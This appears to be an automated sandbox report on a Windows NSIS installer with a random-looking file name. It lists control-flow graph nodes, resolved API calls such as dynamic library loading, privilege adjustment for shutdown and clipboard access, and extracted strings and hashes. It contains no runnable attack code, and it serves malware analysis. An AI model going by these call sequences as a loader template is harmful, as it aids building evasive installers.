SystemParametersInfoW CreateWindowExW 4664->4667 4670 403be6 lstrcmpiW 4665->4670 4671 403c0c 4665->4671 4666->4541 4667->4663 4672 403cdb 4668->4672 4673 403bd5 4669->4673 4670->4671 4674 403bf6 GetFileAttributesW 4670->4674 4675 405cbd 3 API calls 4671->4675 4672->4666 4677 403dae 18 API calls 4672->4677 4673->4665 4676 403c02 4674->4676 4678 403c12 4675->4678 4676->4671 4680 405d09 2 API calls 4676->4680 4681 403cec 4677->4681 4746 4063e8 lstrcpynW 4678->4746 4680->4671 4682 403cf8 ShowWindow 4681->4682 4683 403d7b 4681->4683 4684 406752 3 API calls 4682->4684 4738 405523 OleInitialize 4683->4738 4686 403d10 4684->4686 4688 403d1e GetClassInfoW 4686->4688 4691 406752 3 API calls 4686->4691 4687 403d81 4689 403d9d 4687->4689 4690 403d85 4687->4690 4693 403d32 GetClassInfoW RegisterClassW 4688->4693 4694 403d48 DialogBoxParamW 4688->4694 4692 40140b 2 API calls 4689->4692 4690->4666 4695 40140b 2 API calls 4690->4695 4691->4688 4692->4666 4693->4694 4696 40140b 2 API calls 4694->4696 4695->4666 4696->4666 4697->4545 4698->4577 4699->4546 4701 403a01 4700->4701 4702 4039f7 CloseHandle 4700->4702 4703 403a15 4701->4703 4704 403a0b CloseHandle 4701->4704 4702->4701 4758 403a43 4703->4758 4704->4703 4707 405afa 67 API calls 4708 403819 OleUninitialize 4707->4708 4708->4552 4708->4553 4710 405a63 4709->4710 4711 403838 ExitProcess 4710->4711 4712 405a77 MessageBoxIndirectW 4710->4712 4712->4711 4713->4585 4714->4589 4716 405a10 4715->4716 4717 405a04 CloseHandle 4715->4717 4716->4589 4717->4716 4719 401389 2 API calls 4718->4719 4720 401420 4719->4720 4720->4556 4722 405f1a GetTickCount GetTempFileNameW 4721->4722 4723 405f50 4722->4723 4724 4034a3 4722->4724 4723->4722 4723->4724 4724->4531 4725->4613 4726->4615 4727->4619 4728->4639 4729->4631 4731 403dc2 4730->4731 4747 40632f wsprintfW 4731->4747 4733 403e33 4748 403e67 4733->4748 4735 403b63 4735->4654 4736 403e38 4736->4735 4737 40640a 17 API calls 4736->4737 4737->4736 4751 4043ab 4738->4751 4740 4043ab SendMessageW 4741 40557f OleUninitialize 4740->4741 4741->4687 4742 405546 4744 40556d 4742->4744 4754 401389 4742->4754 4744->4740 4745->4650 4746->4656 4747->4733 4749 40640a 17 API calls 4748->4749 4750 403e75 SetWindowTextW 4749->4750 4750->4736 4752 4043c3 4751->4752 4753 4043b4 SendMessageW 4751->4753 4752->4742 4753->4752 4755 401390 4754->4755 4756 4013fe 4755->4756 4757 4013cb MulDiv SendMessageW 4755->4757 4756->4742 4757->4755 4759 403a51 4758->4759 4760 403a1a 4759->4760 4761 403a56 FreeLibrary GlobalFree 4759->4761 4760->4707 4761->4760 4761->4761 5886 404ba6 5887 404bd2 5886->5887 5888 404bb6 5886->5888 5890 404c05 5887->5890 5891 404bd8 SHGetPathFromIDListW 5887->5891 5897 405a32 GetDlgItemTextW 5888->5897 5892 404bef SendMessageW 5891->5892 5893 404be8 5891->5893 5892->5890 5895 40140b 2 API calls 5893->5895 5894 404bc3 SendMessageW 5894->5887 5895->5892 5897->5894 5905 73b02c57 5906 73b02c6f 5905->5906 5907 73b0158f 2 API calls 5906->5907 5908 73b02c8a 5907->5908 5916 4029a8 5917 402c1f 17 API calls 5916->5917 5918 4029ae 5917->5918 5919 4029d5 5918->5919 5920 4029ee 5918->5920 5925 40288b 5918->5925 5921 4029da 5919->5921 5929 4029eb 5919->5929 5922 402a08 5920->5922 5923 4029f8 5920->5923 5930 4063e8 lstrcpynW 5921->5930 5926 40640a 17 API calls 5922->5926 5924 402c1f 17 API calls 5923->5924 5924->5929 5926->5929 5929->5925 5931 40632f wsprintfW 5929->5931 5930->5925 5931->5925 5932 73b01058 5934 73b01074 5932->5934 5933 73b010dd 5934->5933 5935 73b01516 GlobalFree 5934->5935 5936 73b01092 5934->5936 5935->5936 5937 73b01516 GlobalFree 5936->5937 5938 73b010a2 5937->5938 5939 73b010b2 5938->5939 5940 73b010a9 GlobalSize 5938->5940 5941 73b010b6 GlobalAlloc 5939->5941 5942 73b010c7 5939->5942 5940->5939 5943 73b0153d 3 API calls 5941->5943 5944 73b010d2 GlobalFree 5942->5944 5943->5942 5944->5933 5945 73b018d9 5946 73b018fc 5945->5946 5947 73b01931 GlobalFree 5946->5947 5948 73b01943 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5946->5948 5947->5948 5949 73b01272 2 API calls 5948->5949 5950 73b01ace GlobalFree GlobalFree 5949->5950 5951 4028ad 5952 402c41 17 API calls 5951->5952 5954 4028bb 5952->5954 5953 4028d1 5956 405eb9 2 API calls 5953->5956 5954->5953 5955 402c41 17 API calls 5954->5955 5955->5953 5957 4028d7 5956->5957 5979 405ede GetFileAttributesW CreateFileW 5957->5979 5959 4028e4 5960 4028f0 GlobalAlloc 5959->5960 5961 402987 5959->5961 5962 402909 5960->5962 5963 40297e CloseHandle 5960->5963 5964 4029a2 5961->5964 5965 40298f DeleteFileW 5961->5965 5980 40345d SetFilePointer 5962->5980 5963->5961 5965->5964 5967 40290f 5968 403447 ReadFile 5967->5968 5969 402918 GlobalAlloc 5968->5969 5970 402928 5969->5970 5971 40295c 5969->5971 5973 4031d6 44 API calls 5970->5973 5972 405f90 WriteFile 5971->5972 5974 402968 GlobalFree 5972->5974 5978 402935 5973->5978 5975 4031d6 44 API calls 5974->5975 5976 40297b 5975->5976 5976->5963 5977 402953 GlobalFree 5977->5971 5978->5977 5979->5959 5980->5967 5988 401a30 5989 402c41 17 API calls 5988->5989 5990 401a39 ExpandEnvironmentStringsW 5989->5990 5991 401a4d 5990->5991 5993 401a60 5990->5993 5992 401a52 lstrcmpW 5991->5992 5991->5993 5992->5993 5043 402032 5044 402044 5043->5044 5045 4020f6 5043->5045 5046 402c41 17 API calls 5044->5046 5047 401423 24 API calls 5045->5047 5048 40204b 5046->5048 5053 402250 5047->5053 5049 402c41 17 API calls 5048->5049 5050 402054 5049->5050 5051 40206a LoadLibraryExW 5050->5051 5052 40205c GetModuleHandleW 5050->5052 5051->5045 5054 40207b 5051->5054 5052->5051 5052->5054 5066 406831 WideCharToMultiByte 5054->5066 5057 4020c5 5059 405450 24 API calls 5057->5059 5058 40208c 5060 402094 5058->5060 5061 4020ab 5058->5061 5063 40209c 5059->5063 5062 401423 24 API calls 5060->5062 5069 73b01777 5061->5069 5062->5063 5063->5053 5064 4020e8 FreeLibrary 5063->5064 5064->5053 5067 40685b GetProcAddress 5066->5067 5068 402086 5066->5068 5067->5068 5068->5057 5068->5058 5070 73b017aa 5069->5070 5111 73b01b5f 5070->5111 5072 73b017b1 5073 73b018d6 5072->5073 5074 73b017c2 5072->5074 5075 73b017c9 5072->5075 5073->5063 5161 73b02352 5074->5161 5145 73b02394 5075->5145 5080 73b0182d 5086 73b01833 5080->5086 5087 73b0187e 5080->5087 5081 73b0180f 5174 73b02569 5081->5174 5082 73b017f8 5096 73b017ee 5082->5096 5171 73b02d37 5082->5171 5083 73b017df 5085 73b017e5 5083->5085 5091 73b017f0 5083->5091 5085->5096 5155 73b02aac 5085->5155 5193 73b015c6 5086->5193 5089 73b02569 10 API calls 5087->5089 5099 73b0186f 5089->5099 5090 73b01815 5185 73b015b4 5090->5185 5165 73b02724 5091->5165 5096->5080 5096->5081 5098 73b02569 10 API calls 5098->5099 5102 73b018c5 5099->5102 5199 73b0252c 5099->5199 5101 73b017f6 5101->5096 5102->5073 5104 73b018cf GlobalFree 5102->5104 5104->5073 5108 73b018b1 5108->5102 5203 73b0153d wsprintfW 5108->5203 5109 73b018aa FreeLibrary 5109->5108 5206 73b0121b GlobalAlloc 5111->5206 5113 73b01b83 5207 73b0121b GlobalAlloc 5113->5207 5115 73b01da9 GlobalFree GlobalFree GlobalFree 5116 73b01dc6 5115->5116 5134 73b01e10 5115->5134 5117 73b02192 5116->5117 5126 73b01ddb 5116->5126 5116->5134 5119 73b021b4 GetModuleHandleW 5117->5119 5117->5134 5118 73b01c64 GlobalAlloc 5120 73b01b8e 5118->5120 5122 73b021c5 LoadLibraryW 5119->5122 5123 73b021da 5119->5123 5120->5115 5120->5118 5121 73b01ccd GlobalFree 5120->5121 5124 73b01caf lstrcpyW 5120->5124 5125 73b01cb9 lstrcpyW 5120->5125 5129 73b020ec 5120->5129 5133 73b02064 5120->5133 5120->5134 5137 73b01d0b 5120->5137 5138 73b01fa5 GlobalFree 5120->5138 5140 73b0122c 2 API calls 5120->5140 5121->5120 5122->5123 5122->5134 5214 73b0161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5123->5214 5124->5125 5125->5120 5126->5134 5210 73b0122c 5126->5210 5128 73b0222c 5132 73b02239 lstrlenW 5128->5132 5128->5134 5129->5134 5139 73b02134 lstrcpyW 5129->5139 5131 73b021ec 5131->5128 5143 73b02216 GetProcAddress 5131->5143 5215 73b0161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 5132->5215 5213 73b0121b GlobalAlloc 5133->5213 5134->5072 5137->5120 5208 73b0158f GlobalSize GlobalAlloc 5137->5208 5138->5120 5139->5134 5140->5120 5142 73b02253 5142->5134 5143->5128 5144 73b0206d 5144->5072 5147 73b023ac 5145->5147 5148 73b024d5 GlobalFree 5147->5148 5150 73b02454 GlobalAlloc WideCharToMultiByte 5147->5150 5151 73b0247f GlobalAlloc CLSIDFromString 5147->5151 5152 73b0122c GlobalAlloc lstrcpynW 5147->5152 5154 73b0249e 5147->5154 5217 73b012ba 5147->5217 5148->5147 5149 73b017cf 5148->5149 5149->5082 5149->5083 5149->5096 5150->5148 5151->5148 5152->5147 5154->5148 5221 73b026b8 5154->5221 5157 73b02abe 5155->5157 5156 73b02b63 CreateFileA 5160 73b02b81 5156->5160 5157->5156 5159 73b02c4d 5159->5096 5224 73b02a56 5160->5224 5162 73b02367 5161->5162 5163 73b02372 GlobalAlloc 5162->5163 5164 73b017c8 5162->5164 5163->5162 5164->5075 5169 73b02754 5165->5169 5166 73b02802 5168 73b02808 GlobalSize 5166->5168 5170 73b02812 5166->5170 5167 73b027ef GlobalAlloc 5167->5170 5168->5170 5169->5166 5169->5167 5170->5101 5172 73b02d42 5171->5172 5173 73b02d82 GlobalFree 5172->5173 5228 73b0121b GlobalAlloc 5174->5228 5176 73b025ec MultiByteToWideChar 5181 73b02573 5176->5181 5177 73b0260e StringFromGUID2 5177->5181 5178 73b0261f lstrcpynW 5178->5181 5179 73b02632 wsprintfW 5179->5181 5180 73b02656 GlobalFree 5180->5181 5181->5176 5181->5177 5181->5178 5181->5179 5181->5180 5182 73b0268b GlobalFree 5181->5182 5183 73b01272 2 API calls 5181->5183 5229 73b012e1 5181->5229 5182->5090 5183->5181 5233 73b0121b GlobalAlloc 5185->5233 5187 73b015b9 5188 73b015c6 2 API calls 5187->5188 5189 73b015c3 5188->5189 5190 73b01272 5189->5190 5191 73b012b5 GlobalFree 5190->5191 5192 73b0127b GlobalAlloc lstrcpynW 5190->5192 5191->5099 5192->5191 5194 73b015d2 wsprintfW 5193->5194 5195 73b015ff lstrcpyW 5193->5195 5198 73b01618 5194->5198 5195->5198 5198->5098 5200 73b0253a 5199->5200 5202 73b01891 5199->5202 5201 73b02556 GlobalFree 5200->5201 5200->5202 5201->5200 5202->5108 5202->5109 5204 73b01272 2 API calls 5203->5204 5205 73b0155e 5204->5205 5205->5102 5206->5113 5207->5120 5209 73b015ad 5208->5209 5209->5137 5216 73b0121b GlobalAlloc 5210->5216 5212 73b0123b lstrcpynW 5212->5134 5213->5144 5214->5131 5215->5142 5216->5212 5218 73b012c1 5217->5218 5219 73b0122c 2 API calls 5218->5219 5220 73b012df 5219->5220 5220->5147 5222 73b026c6 VirtualAlloc 5221->5222 5223 73b0271c 5221->5223 5222->5223 5223->5154 5225 73b02a61 5224->5225 5226 73b02a71 5225->5226 5227 73b02a66 GetLastError 5225->5227 5226->5159 5227->5226 5228->5181 5230 73b012ea 5229->5230 5231 73b0130c 5229->5231 5230->5231 5232 73b012f0 lstrcpyW 5230->5232 5231->5181 5232->5231 5233->5187 5235 401735 5236 402c41 17 API calls 5235->5236 5237 40173c SearchPathW 5236->5237 5238 4029e6 5237->5238 5239 401757 5237->5239 5239->5238 5241 4063e8 lstrcpynW 5239->5241 5241->5238 5999 402a35 6000 402c1f 17 API calls 5999->6000 6001 402a3b 6000->6001 6002 402a72 6001->6002 6004 40288b 6001->6004 6005 402a4d 6001->6005 6003 40640a 17 API calls 6002->6003 6002->6004 6003->6004 6005->6004 6007 40632f wsprintfW 6005->6007 6007->6004 6008 4014b8 6009 4014be 6008->6009 6010 401389 2 API calls 6009->6010 6011 4014c6 6010->6011 6012 401db9 GetDC 6013 402c1f 17 API calls 6012->6013 6014 401dcb GetDeviceCaps MulDiv ReleaseDC 6013->6014 6015 402c1f 17 API calls 6014->6015 6016 401dfc 6015->6016 6017 40640a 17 API calls 6016->6017 6018 401e39 CreateFontIndirectW 6017->6018 6019 402592 6018->6019 6020 40283b 6021 402843 6020->6021 6022 402847 FindNextFileW 6021->6022 6023 402859 6021->6023 6022->6023 6024 4029e6 6023->6024 6026 4063e8 lstrcpynW 6023->6026 6026->6024

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 4034a5-4034e2 SetErrorMode GetVersion 1 4034e4-4034ec call 4067c2 0->1 2 4034f5 0->2 1->2 8 4034ee 1->8 4 4034fa-40350e call 406752 lstrlenA 2->4 9 403510-40352c call 4067c2 * 3 4->9 8->2 16 40353d-40359c #17 OleInitialize SHGetFileInfoW call 4063e8 GetCommandLineW call 4063e8 9->16 17 40352e-403534 9->17 24 4035a6-4035c0 call 405cea CharNextW 16->24 25 40359e-4035a5 16->25 17->16 21 403536 17->21 21->16 28 4035c6-4035cc 24->28 29 4036d7-4036f1 GetTempPathW call 403474 24->29 25->24 30 4035d5-4035d9 28->30 31 4035ce-4035d3 28->31 36 4036f3-403711 GetWindowsDirectoryW lstrcatW call 403474 29->36 37 403749-403763 DeleteFileW call 402f30 29->37 34 4035e0-4035e4 30->34 35 4035db-4035df 30->35 31->30 31->31 38 4036a3-4036b0 call 405cea 34->38 39 4035ea-4035f0 34->39 35->34 36->37 53 403713-403743 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403474 36->53 57 403814-403824 call 4039e6 OleUninitialize 37->57 58 403769-40376f 37->58 55 4036b2-4036b3 38->55 56 4036b4-4036ba 38->56 43 4035f2-4035fa 39->43 44 40360b-403644 39->44 48 403601 43->48 49 4035fc-4035ff 43->49 50 403661-40369b 44->50 51 403646-40364b 44->51 48->44 49->44 49->48 50->38 54 40369d-4036a1 50->54 51->50 52 40364d-403655 51->52 60 403657-40365a 52->60 61 40365c 52->61 53->37 53->57 54->38 63 4036c2-4036d0 call 4063e8 54->63 55->56 56->28 64 4036c0 56->64 73 40394a-403950 57->73 74 40382a-40383a call 405a4e ExitProcess 57->74 65 403804-40380b call 403ad8 58->65 66 403775-403780 call 405cea 58->66 60->50 60->61 61->50 69 4036d5 63->69 64->69 76 403810 65->76 80 403782-4037b7 66->80 81 4037ce-4037d8 66->81 69->29 78 403952-403968 GetCurrentProcess OpenProcessToken 73->78 79 4039ce-4039d6 73->79 76->57 87 40396a-403998 LookupPrivilegeValueW AdjustTokenPrivileges 78->87 88 40399e-4039ac call 4067c2 78->88 82 4039d8 79->82 83 4039dc-4039e0 ExitProcess 79->83 89 4037b9-4037bd 80->89 85 403840-403854 call 4059b9 lstrcatW 81->85 86 4037da-4037e8 call 405dc5 81->86 82->83 100 403861-40387b lstrcatW lstrcmpiW 85->100 101 403856-40385c lstrcatW 85->101 86->57 99 4037ea-403800 call 4063e8 * 2 86->99 87->88 102 4039ba-4039c5 ExitWindowsEx 88->102 103 4039ae-4039b8 88->103 90 4037c6-4037ca 89->90 91 4037bf-4037c4 89->91 90->89 95 4037cc 90->95 91->90 91->95 95->81 99->65 100->57 106 40387d-403880 100->106 101->100 102->79 104 4039c7-4039c9 call 40140b 102->104 103->102 103->104 104->79 109 403882-403887 call 40591f 106->109 110 403889 call 40599c 106->110 115 40388e-40389c SetCurrentDirectoryW 109->115 110->115 118 4038a9-4038d2 call 4063e8 115->118 119 40389e-4038a4 call 4063e8 115->119 123 4038d7-4038f3 call 40640a DeleteFileW 118->123 119->118 126 403934-40393c 123->126 127 4038f5-403905 CopyFileW 123->127 126->123 128 40393e-403945 call 4061ae 126->128 127->126 129 403907-403927 call 4061ae call 40640a call 4059d1 127->129 128->57 129->126 138 403929-403930 CloseHandle 129->138 138->126
                                                  APIs
                                                  • SetErrorMode.KERNELBASE ref: 004034C8
                                                  • GetVersion.KERNEL32 ref: 004034CE
                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403501
                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 0040353E
                                                  • OleInitialize.OLE32(00000000), ref: 00403545
                                                  • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 00403561
                                                  • GetCommandLineW.KERNEL32(00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 00403576
                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000020,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000,?,00000006,00000008,0000000A), ref: 004035AE
                                                    • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,00000020,?,00403517,0000000A), ref: 004067D4
                                                    • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004036E8
                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004036F9
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403705
                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 00403719
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403721
                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 00403732
                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373A
                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 0040374E
                                                    • Part of subcall function 004063E8: lstrcpynW.KERNEL32(?,?,00000400,00403576,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063F5
                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 00403819
                                                  • ExitProcess.KERNEL32 ref: 0040383A
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040384D
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 0040385C
                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403867
                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\ix8kxoBHDb.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403873
                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040388F
                                                  • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,0042B000,00000008,?,00000006,00000008,0000000A), ref: 004038E9
                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\ix8kxoBHDb.exe,00420EE8,00000001,?,00000006,00000008,0000000A), ref: 004038FD
                                                  • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000,?,00000006,00000008,0000000A), ref: 0040392A
                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403959
                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00403960
                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403975
                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403998
                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 004039BD
                                                  • ExitProcess.KERNEL32 ref: 004039E0
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                  • String ID: "C:\Users\user\Desktop\ix8kxoBHDb.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\brugser\brugo$C:\Users\user\AppData\Roaming\brugser\brugo\Obstetriker$C:\Users\user\Desktop$C:\Users\user\Desktop\ix8kxoBHDb.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                  • API String ID: 3441113951-4038786272
                                                  • Opcode ID: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                  • Instruction ID: dafc1af32610b20ef8647c0cf6a3faef20d76686829591872cbc6ab955e55f97
                                                  • Opcode Fuzzy Hash: e11a689ec9d555b5fe2f652178506891ef29a00bc77516d82e2752c077597b55
                                                  • Instruction Fuzzy Hash: 4DD1F571600310ABE7206F759D49A3B3AECEB4070AF50443FF981B62D2DB7D8956876E

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 139 40558f-4055aa 140 4055b0-405677 GetDlgItem * 3 call 404394 call 404ced GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 405739-405740 139->141 159 405695-405698 140->159 160 405679-405693 SendMessageW * 2 140->160 143 405742-405764 GetDlgItem CreateThread CloseHandle 141->143 144 40576a-405777 141->144 143->144 145 405795-40579f 144->145 146 405779-40577f 144->146 150 4057a1-4057a7 145->150 151 4057f5-4057f9 145->151 148 405781-405790 ShowWindow * 2 call 404394 146->148 149 4057ba-4057c3 call 4043c6 146->149 148->145 163 4057c8-4057cc 149->163 155 4057a9-4057b5 call 404338 150->155 156 4057cf-4057df ShowWindow 150->156 151->149 153 4057fb-405801 151->153 153->149 161 405803-405816 SendMessageW 153->161 155->149 164 4057e1-4057ea call 405450 156->164 165 4057ef-4057f0 call 404338 156->165 166 4056a8-4056bf call 40435f 159->166 167 40569a-4056a6 SendMessageW 159->167 160->159 168 405918-40591a 161->168 169 40581c-405847 CreatePopupMenu call 40640a AppendMenuW 161->169 164->165 165->151 178 4056c1-4056d5 ShowWindow 166->178 179 4056f5-405716 GetDlgItem SendMessageW 166->179 167->166 168->163 176 405849-405859 GetWindowRect 169->176 177 40585c-405871 TrackPopupMenu 169->177 176->177 177->168 180 405877-40588e 177->180 181 4056e4 178->181 182 4056d7-4056e2 ShowWindow 178->182 179->168 183 40571c-405734 SendMessageW * 2 179->183 184 405893-4058ae SendMessageW 180->184 185 4056ea-4056f0 call 404394 181->185 182->185 183->168 184->184 186 4058b0-4058d3 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 4058d5-4058fc SendMessageW 186->188 188->188 189 4058fe-405912 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->168
                                                  APIs
                                                  • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                                  • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                                  • GetClientRect.USER32(?,?), ref: 00405639
                                                  • GetSystemMetrics.USER32(00000002), ref: 00405640
                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                                  • ShowWindow.USER32(?,00000008), ref: 004056DC
                                                  • GetDlgItem.USER32(?,000003EC), ref: 004056FD
                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040560B
                                                    • Part of subcall function 00404394: SendMessageW.USER32(00000028,?,00000001,004041BF), ref: 004043A2
                                                  • GetDlgItem.USER32(?,000003EC), ref: 0040574F
                                                  • CreateThread.KERNELBASE(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                                  • CloseHandle.KERNELBASE(00000000), ref: 00405764
                                                  • ShowWindow.USER32(00000000), ref: 00405788
                                                  • ShowWindow.USER32(?,00000008), ref: 0040578D
                                                  • ShowWindow.USER32(00000008), ref: 004057D7
                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                                  • CreatePopupMenu.USER32 ref: 0040581C
                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                                  • GetWindowRect.USER32(?,?), ref: 00405850
                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405869
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                                  • OpenClipboard.USER32(00000000), ref: 004058B1
                                                  • EmptyClipboard.USER32 ref: 004058B7
                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                                  • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                                  • CloseClipboard.USER32 ref: 00405912
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.1442206547.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.1442192343.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442221250.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442236543.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.1442356648.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_ix8kxoBHDb.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
